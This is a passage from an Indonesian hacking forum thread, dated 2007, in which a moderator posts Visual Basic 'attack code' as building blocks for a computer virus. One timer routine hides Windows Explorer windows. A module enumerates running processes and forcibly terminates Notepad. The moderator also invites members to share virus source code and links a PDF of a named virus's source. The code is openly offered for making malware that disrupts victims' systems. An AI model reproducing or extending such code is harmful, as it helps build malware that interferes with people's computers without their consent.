Private Const WM_GETTEXT = &HD
Private Const SW_HIDE = 0
Private Sub Timer1_Timer()
Dim FW1 As Long
Dim FW2 As Long
FW1 = FindWindow("ExploreWClass", vbNullString)
FW2 = FindWindow("CabinetWClass", vbNullString)
If FW1 <> 0 Or FW2 <> 0 Then
Dim cap1 As String * 255
Dim cap2 As String * 255
SendMessage FW1, WM_GETTEXT, 255, ByVal cap1
SendMessage FW2, WM_GETTEXT, 255, ByVal cap2
cap1 = Left$(cap1, InStr(1, cap1, Chr$(0)) - 1)
cap2 = Left$(cap2, InStr(1, cap2, Chr$(0)) - 1)
If InStr(1, UCase(cap1), "WINDOWS") Then
ShowWindow FW1, SW_HIDE
End If
If InStr(1, UCase(cap2), "WINDOWS") Then
ShowWindow FW2, SW_HIDE
End If
End If
End Sub
Kode Penyerangan5:
Siapkan satu buah form, satu buah timer dengan Interval=100 dan satu buah module.
Ketikan pada form1:
Code:
Private Sub Timer1_Timer()
TaskProses
End Sub
....
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-14-2007, 01:51 PM #18
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Ketikan pada module:
Code:
Public Declare Function CreateToolhelp32Snapshot Lib "kernel32" _
(ByVal lFlags As Long, ByVal lProcessID As Long) As Long
Public Declare Function Process32First Lib "kernel32" (ByVal hSnapShot As
Long, uProcess As PROCESSENTRY32) As Long
Public Declare Function Process32Next Lib "kernel32" (ByVal hSnapShot As Long,
uProcess As PROCESSENTRY32) As Long
Public Declare Sub CloseHandle Lib "kernel32" (ByVal hPass As Long)
Public Declare Function TerminateProcess Lib "kernel32" _
(ByVal hProcess As Long, ByVal uExitCode As Long) As Long
Public Declare Function OpenProcess Lib "kernel32" _
(ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, _
ByVal dwProcessId As Long) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal
nCmdShow As Long) As Long
Public Declare Function LockWindowUpdate Lib "user32" _
(ByVal hwndLock As Long) As Long
Public Const TH32CS_SNAPHEAPLIST = &H1
Public Const TH32CS_SNAPPROCESS = &H2
Public Const TH32CS_SNAPTHREAD = &H4
Public Const TH32CS_SNAPMODULE = &H8
Public Const TH32CS_SNAPALL = (TH32CS_SNAPHEAPLIST Or TH32CS_SNAPPROCESS _
Or TH32CS_SNAPTHREAD Or TH32CS_SNAPMODULE)
Public Const TH32CS_INHERIT = &H80000000
Public Const MAX_PATH As Integer = 260
Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * MAX_PATH
End Type
Public Sub TaskProses()
Dim hSnapShot As Long, uProcess As PROCESSENTRY32, R As Long
Dim hProcess As Long, NamaFile As String
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0&)
uProcess.dwSize = Len(uProcess)
R = Process32First(hSnapShot, uProcess)
Do While R
NamaFile = uProcess.szExeFile
NamaFile = Left$(NamaFile, InStr(1, NamaFile, Chr$(0)) - 1)
If LCase(NamaFile) = "notepad.exe" Then
CloseHandle hSnapShot
hProcess = OpenProcess(&H1F0FFF, False, uProcess.th32ProcessID)
x = TerminateProcess(hProcess, 0)
Exit Do
End If
R = Process32Next(hSnapShot, uProcess)
Loop
CloseHandle hSnapShot
End Sub
Untuk tahap serangan sudah selesai... berikut kita mengepost segala macam source code virus... bagi yang mau ngepost silahkan..
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-14-2007, 02:04 PM #19
Naufalz
Keujreuen
Join Date: Jun 2007
Posts: 314
:
Thanks: 0
Thanked 0 Times in 0 Posts
wow...
kira2belajarnya lama gak ya...
mumang teh tangieng nyan...
mungken karna hana hobby...
07-14-2007, 02:22 PM #20
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Source Code Virus 4k51k4
Mau source codenya ???
kamu harus ada Software VB dulu oke .....
ikutin aja petunjuk nya :
ni link source codenya : Code Virus 4k51k4.pdf
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
Page 1 of 2 1 2 >
Bookmarks
Digg
del.icio.us
StumbleUpon
Google
« Previous Thread | Next Thread »
Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump
Similar Threads
Thread Thread Starter Forum Replies Last Post
PEmograman Virus... Seru :) Joglo Pemrograman 15 02-01-2009 03:05 PM
Mengenal Dengan Virus Komputer fadhlands Backdoor, Virus, Trojan, Rootkit 85 08-01-2008 05:49 PM
gimana ngilangin brontok teuKu Backdoor, Virus, Trojan, Rootkit 9 04-27-2008 06:12 PM
Seting Vhost pda psybnc A_C_E_H_M_A_N_I_A Computer Stuff 17 10-02-2007 02:03 PM
Memahami Virus Komputer FajRi Backdoor, Virus, Trojan, Rootkit 17 12-30-2006 03:20 AM
All times are GMT +7. The time now is 03:54 PM.
- Contact Us - Aceh Forum - Sitemap - Top
Powered By AcehFo®um
Copyright © 2005 - 2009 Welcome
Forum SEO by Zoints
AcehForum